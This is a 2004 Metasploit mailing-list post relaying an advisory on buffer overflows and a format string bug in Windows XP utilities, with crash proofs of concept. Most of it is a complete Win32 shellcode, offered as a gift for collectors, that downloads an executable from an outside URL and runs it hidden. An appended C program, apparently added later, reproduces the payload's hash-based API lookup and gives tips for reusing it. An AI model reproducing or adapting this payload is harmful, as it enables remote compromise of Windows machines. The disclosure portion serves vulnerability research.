Metasploit mailing list archives
Windows XP multiple local buffer overflows and format string bugs
From: jerome.athias at caramail.com (Jérôme ATHIAS)
Date: Fri, 22 Oct 2004 18:23:41 GMT
Hi guys, I just got here after moving, so sorry if I'm wrong, but I don't remember having seen this on Bugtraq, so if someone is interested...

AUTHOR: Komrade
DATE: 08/10/2004
PRODUCT: Windows XP
Tested on Windows XP Service Pack 2; prior versions should have the same bugs.

DETAILS
Here is a list of some Windows XP utilities that are vulnerable to local buffer overflows and format string bugs. These programming errors, alone, are not security vulnerabilities (you need local access and you don't gain more privilege), but they could become serious security issues if someone has the possibility to remotely start a program with at least one parameter (which is what happens with the "shell:" protocol security issue in the Mozilla browser prior to version 1.7.3, which permits remotely executing a program and passing parameters to it). This information has been disclosed to inform you that if a new vulnerability is discovered which allows remote execution of programs (passing parameters), all Windows XP operating systems will be affected by several remote buffer overflows and format string vulnerabilities allowing remote code execution.
Buffer overflow in immc.exe
POC: c:\> immc.exe aaaaaaaaaa (285 'a' characters)

Buffer overflow in eventvwr.exe (UNICODE)
POC: c:\> eventvwr.exe aaaaaaaaaa (848 'a' characters)

Buffer overflow in netsetup.exe
POC: c:\> netsetup.exe aaaaaaaaaa (285 'a' characters)

Buffer overflow in mrinfo.exe
POC: c:\> mrinfo.exe aaaaaaaaaa (71 'a' characters)

Format string in sort.exe
POC: c:\> sort.exe %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n

GIFT: This is a generic win32 web downloading and executing shellcode for your collection

    [BITS 32]

            jmp data
    start:
            pop edi                     ; edi -> data block: "mhh.exe\0" followed by the URL
            call LK32Base
            mov ebx, eax                ; ebx = kernel32 base address (kept for later lookups)
            push eax                    ; kernel32 base address
            push 0xec0e4e8e             ; LoadLibraryA hash
            call LGetProcAddress        ; find address
            xor ecx, ecx                ; ecx = 0
            mov cx, 0x6e6f              ; move "on" into cx
            push ecx                    ; push null-terminated "on"
            push 0x6d6c7275             ; push "urlm", completing "urlmon\0"
            push esp                    ; lpLibFileName
            call eax                    ; eax holds our function address

    download:
            push eax                    ; urlmon.dll base address
            push 0x702f1a36             ; URLDownloadToFileA hash
            call LGetProcAddress        ; find address
            xor ecx, ecx                ; ecx = 0 for later use
            push ecx                    ; lpfnCB
            push ecx                    ; dwReserved
            lea esi, [edi]              ; path is [edi + start_of_filename]
            push esi                    ; szFileName
            lea esi, [edi + 8]          ; URL follows the 8-byte "mhh.exe\0"
            push esi                    ; szURL
            push ecx                    ; pCaller
            call eax                    ; eax holds our function address

    exec:
            push ebx                    ; kernel32 base address
            push 0x0e8afe98             ; WinExec hash
            call LGetProcAddress
            xor ecx, ecx                ; ecx = 0 again (clobbered by the API call and by LGetProcAddress)
            push ecx                    ; uCmdShow = SW_HIDE
            push edi                    ; lpCmdLine = "mhh.exe"
            call eax                    ; WinExec
            xor ecx, ecx
            dec ecx
    bla:
            loop bla                    ; stupid loop, remove if you don't like it
            push ebx
            push 0x73e2d87e             ; ExitProcess hash
            call LGetProcAddress
            call eax                    ; exit

    ; Return the kernel32.dll base address in eax by walking the PEB loader list.
    ; On Windows XP the second entry of InInitializationOrderModuleList is kernel32.dll.
    LK32Base:
            push ebp
            push esi
            mov eax, [fs:0x30]          ; PEB
            mov eax, [eax + 0x0c]       ; PEB->Ldr
            mov esi, [eax + 0x1c]       ; InInitializationOrderModuleList.Flink (ntdll entry)
            lodsd                       ; next entry: kernel32.dll
            mov ebp, [eax + 0x08]       ; DllBase
            mov eax, ebp
            pop esi
            pop ebp
            ret

    ; Arguments (pushed before the call): hash, then DLL base address.
    ; Returns the function address in eax, or 0 when no export name hashes to the argument.
    LGetProcAddress:
            push ebx
            push ebp
            push esi
            push edi
            mov ebp, [esp + 24]         ; DLL base address
            mov eax, [ebp + 0x3c]       ; eax = PE header offset
            mov edx, [ebp + eax + 120]
            add edx, ebp                ; edx = export directory table
            mov ecx, [edx + 24]         ; ecx = number of name pointers
            mov ebx, [edx + 32]
            add ebx, ebp                ; ebx = name pointers table
    LFnlp:
            jecxz LNtfnd
            dec ecx
            mov esi, [ebx + ecx * 4]
            add esi, ebp                ; esi = name pointer
            xor edi, edi
            cld
    LHshlp:
            xor eax, eax
            lodsb
            cmp al, ah                  ; ah is 0: stop at the terminating NUL
            je LFnd
            ror edi, 13
            add edi, eax
            jmp LHshlp
    LFnd:
            cmp edi, [esp + 20]         ; compare computed hash to argument
            jnz LFnlp
            mov ebx, [edx + 36]         ; ebx = ordinals table RVA
            add ebx, ebp
            mov cx, [ebx + 2 * ecx]     ; ecx = function ordinal
            mov ebx, [edx + 28]         ; ebx = address table RVA
            add ebx, ebp
            mov eax, [ebx + 4 * ecx]    ; eax = address of function RVA
            add eax, ebp
            jmp LDone
    LNtfnd:
            xor eax, eax
    LDone:
            mov edx, ebp
            pop edi
            pop esi
            pop ebp
            pop ebx
            ret

    data:
            call start
            db "mhh.exe", 0x00
            db "http://www.ilovedelikon.com/notbig.exe", 0x00

Sorry if this information is out of date or shit...
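The four constants the shellcode pushes before each LGetProcAddress call (0xec0e4e8e, 0x702f1a36, 0x0e8afe98, 0x73e2d87e) are ror-13 hashes of export names, and LGetProcAddress walks the export name table backwards until one hashes to the argument. The C program below, added here as an example and not part of Komrade's or Jérôme's post, reproduces that hash loop in portable code and models the name -> ordinal -> address lookup over a small constructed export table, so the constants can be checked and new ones generated without assembling anything. The export table, its ordinals and the RVAs in it are made up for the example; on a real DLL those arrays come from the export directory at [base + e_lfanew + 120], as in the shellcode.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* ror-13 hash exactly as the shellcode's LHshlp loop computes it:
 * edi = 0; for each byte up to the NUL: edi = ror(edi, 13); edi += byte.
 * The terminating NUL is not folded in. */
uint32_t ror13_hash(const char *name)
{
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++) {
        h = (h >> 13) | (h << 19);   /* ror edi, 13 */
        h += *p;                     /* add edi, eax */
    }
    return h;
}

/* Constructed stand-in for a PE export directory: AddressOfNames,
 * AddressOfNameOrdinals and AddressOfFunctions. A real table is read from
 * the export directory of the loaded DLL; these arrays are made up. */
struct fake_exports {
    const char **names;
    const uint16_t *ordinals;
    const uint32_t *functions;
    size_t number_of_names;
    size_t number_of_functions;
};

/* Mirror of LGetProcAddress: walk the name table from the last entry
 * (the shellcode does `dec ecx` before the load), hash each name, and on a
 * match go name index -> ordinal -> function RVA. Returns 0 when nothing
 * matches, as the shellcode returns eax = 0 at LNtfnd. */
uint32_t resolve_by_hash(const struct fake_exports *ex, uint32_t wanted)
{
    size_t i = ex->number_of_names;
    while (i > 0) {
        i--;
        if (ror13_hash(ex->names[i]) == wanted) {
            uint16_t ordinal = ex->ordinals[i];
            if (ordinal >= ex->number_of_functions)
                return 0;            /* corrupt table; the shellcode would read garbage here */
            return ex->functions[ordinal];
        }
    }
    return 0;
}

/* Sample table (constructed), names in the sorted order a real export name
 * table uses. Ordinals deliberately differ from name indexes so the
 * AddressOfNameOrdinals indirection is exercised. RVAs are invented. */
static const char *sample_names[] = {
    "ExitProcess", "GetProcAddress", "LoadLibraryA", "WinExec",
};
static const uint16_t sample_ordinals[] = { 3, 0, 2, 1 };
static const uint32_t sample_functions[] = {
    0x00011000, /* ordinal 0: GetProcAddress */
    0x00012000, /* ordinal 1: WinExec */
    0x00013000, /* ordinal 2: LoadLibraryA */
    0x00014000, /* ordinal 3: ExitProcess */
};
const struct fake_exports sample_exports = {
    sample_names, sample_ordinals, sample_functions, 4, 4,
};

int main(void)
{
    const char *probe[] = { "LoadLibraryA", "URLDownloadToFileA", "WinExec", "ExitProcess" };
    for (size_t i = 0; i < sizeof probe / sizeof probe[0]; i++)
        printf("%-20s 0x%08x\n", probe[i], ror13_hash(probe[i]));
    printf("WinExec resolves to RVA 0x%08x in the sample table\n",
           resolve_by_hash(&sample_exports, ror13_hash("WinExec")));
    return 0;
}
```

Two points worth keeping in mind when reusing the scheme: the hash is only 32 bits and not collision-resistant, so a new constant should be checked against every export of the target DLL before use, and because the scan runs from the last name backwards, a collision returns whichever matching name sits later in the table, not necessarily the one you meant.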
Current thread:
- Windows XP multiple local buffer overflows and format string bugs Jérôme ATHIAS (Oct 22)